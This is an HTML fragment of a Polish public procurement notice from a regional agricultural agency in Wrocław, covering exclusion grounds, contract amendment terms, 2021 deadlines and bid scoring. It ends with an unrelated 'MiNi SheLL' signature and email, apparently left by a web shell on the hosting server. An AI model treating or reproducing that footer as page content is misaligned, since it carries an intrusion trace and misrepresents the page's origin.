fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie o niepodleganiu wykluczeniu składane wraz z ofertą na wzorze stanowiącym załącznik<br/>nr 2 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 2 Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. 3 Przepisy dotyczące wykonawcy stosuje się<br/>odpowiednio do wykonawców wspólnie ubiegają-cych się o udzielenie zamówienia. 4 W<br/>przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej<br/>Wykonawców warunek udziału w postepowaniu w zakresie wymaganego doświadczenia<br/>zostanie uznany za spełniony, jeżeli wykonawcy wspólnie wykażą się całym wymaganym<br/>doświadczeniem.5. Oświadczenie o spełnianiu warunków i niepodleganiu wykluczeniu<br/>składa każdy z wykonawców –oświadczenia te potwierdzają brak<br/>podstaw do wykluczenia, spełnianie warunków udziału w postępowaniu, w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.6 Jeżeli została<br/>wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych wykonawców. Umowa taka winna określać strony umowy, cel<br/>działania, sposób współdziałania, zakres prac przewidzianych do wykonania przez każdego z<br/>nich, solidarną odpowiedzialność za wykonanie zamówienia oraz termin, na jaki została zawarta<br/>umowa (który nie może być krótszy niż termin realizacji <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W przypadku wystąpienia zmian dot. zatrudnienia osób wykonujących czynności wskazane<br/>przez Zamawiającego do wykonania na podstawie umowy o pracę, Wykonawca ma obowiązek<br/>w terminie 3 dni przed dokonaniem zmiany zgłosić Zamawiającemu, pisemnie na adres<br/>wskazany w komparycji lub drogą mailową na adres wskazany w § 13 ust. 1, każdą zmianę.<br/>Wykonawca zobowiązany jest do przekazania Zamawiającemu nowego wykazu osób<br/>zatrudnionych przy realizacji zamówienia na podstawie umowy o pracę wraz ze wskazaniem<br/>czynności, które będą oni wykonywać. Osoba zastępująca osobę wskazaną do wykonywania<br/>usługi musi posiadać kwalifikacje i doświadczenie zawodowe nie gorsze niż osoba wskazana do<br/>wykonywania usługi w ofercie.<br/>1. Zmiana wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:<br/>1) stawki podatku od towarów i usług, o ile wykonawca jest podatku VAT<br/>2) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5<br/>ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>2. W przypadku zmiany, o której mowa ust 1 pkt 1), wartość netto wynagrodzenia wykonawcy<br/>nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na<br/>podstawie nowych przepisów.<br/>3. W przypadku zmiany, o której mowa ust 1 pkt 2), wynagrodzenie wykonawcy ulegnie zmianie<br/>o wartość wzrostu całkowitego kosztu wykonawcy wynikającego ze zwiększenia wynagrodzeń<br/>osób bezpośrednio wykonujących zamówienie do wysokości zmiennego minimalnego<br/>wynagrodzenia, z uwzględnieniem wszystkich obciążeń publiczno-prawnych od kwoty wzrostu<br/>minimalnego wynagrodzenia, o ile wynagrodzenie wykonawcy jest niższe niż nowa ustalona<br/>wysokość minimalnego wynagrodzenia.<br/>4. W przypadku zmiany, o której mowa ust 1 pkt 3), wynagrodzenie wykonawcy ulegnie zmianie<br/>o wartość całkowitego kosztu wykonawcy, jaki będzie on zobowiązany dodatkowo ponieść w<br/>celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia<br/>osób bezpośrednio wykonujących zamówienie na rzecz zamawiającego.<br/>5. W przypadku zmiany, o której mowa ust. 1 pkt 4) wynagrodzenie wykonawcy ulegnie zmianie<br/>o wartość całkowitego kosztu wykonawcy ponoszonego przez Wykonawcę w odniesieniu do<br/>ilości pracowników uczestniczących w realizacji niniejszej umowy.<br/>6. Wprowadzenie zmian wysokości wynagrodzenia wymaga uprzedniego złożenia przez<br/>wykonawcę dowodów wraz z oświadczeniem o wysokości dodatkowych kosztów wynikających z<br/>wprowadzenia zmian, o których mowa w ust .1.<br/>7. Wprowadzone zmiany wysokości wynagrodzenia obowiązywać będą od dnia zawarcia aneksu w formie pisemnej pod rygorem nieważności.<br/>8. Zamawiający nie przewiduję zmian umowy o których mowa art. 439 ust. 1 oraz 439 ust 5<br/>ustawy Prawo zamówień publicznych. Zamawiający umożliwia Wykonawcy nieodpłatną obsługę<br/>organizacyjno-techniczną w Biurze Krajowego Ośrodka Wsparcia Rolnictwa Oddziału<br/>Terenowego we Wrocławiu w zakresie wskazanym w § 1 ust. 8 umowy. Ewentualna zmiana<br/>ceny materiałów lub kosztów związanych z realizacją zamówienia nie wpływa na wartość<br/>realizowanego zamówienia przez Wykonawcę i obciąża Zamawiającego <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-13 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-13 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> informacje uzupełniające do opisu kryteriów oceny ofert: Zamawiający przyzna Wykonawcy<br/>punkty za doświadczenie osób wyznaczonych do realizacji zamówienia (wskazanych w ofercie),<br/>mające wpływ na jakość wykonania zamówienia, tj.<br/>a) za ilość przeprowadzonych (w okresie trzech lat przed upływem terminu składania ofert) spraw związanych z ustanawianiem ograniczonych praw rzeczowych (służebności) dotyczących budowy, przebudowy, modernizacji, remontów sieci i urządzeń przesyłowych lub wykonanych<br/>projektów przebiegu urządzeń infrastruktury technicznej - waga 20 % - Wykonawca może uzyskać maksymalnie 20 punktów:<br/>Wykonawca otrzyma po 1 punkcie za każdą wykazaną sztukę przeprowadzonej sprawy lub wykonanego projektu.<br/>b) za ilość przygotowanych (w okresie trzech lat przed upływem terminu składania ofert)<br/>projektów umów regulujących zasady udostępniania inwestorom nieruchomości będących<br/>przedmiotem ustanowienia ograniczonych praw rzeczowych (służebności) - waga 10 % -<br/>Wykonawca może uzyskać maksymalnie 10 punktów:<br/>Wykonawca otrzyma po 1 punkcie za każdą wykazaną sztukę przygotowanego projektu umowy.<br/>c) za ilość przeprowadzonych (w okresie trzech lat przed upływem terminu składania ofert) lustracji nieruchomości gruntowych - waga 10 % - Wykonawca może uzyskać maksymal-nie 10 punktów:<br/>Wykonawca otrzyma po 1 punkcie za każdą wykazaną sztukę przeprowadzonej lustracji nieruchomości gruntowej<br/>Zamawiający oceni oferty w niniejszym kryterium na podstawie informacji wskazanych<br/>przez Wykonawcę w ofercie. Treść wskazanych informacji nie podlega uzupełnieniu lub<br/>poprawieniu po upływie terminu składania ofert.<br/>Wykonawca nie otrzyma punktów w wyżej wymienionych kryteriach, w przypadku nie<br/>wskazania w ofercie informacji niezbędnych dla oceny oferty lub wskazania informacji niepełnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com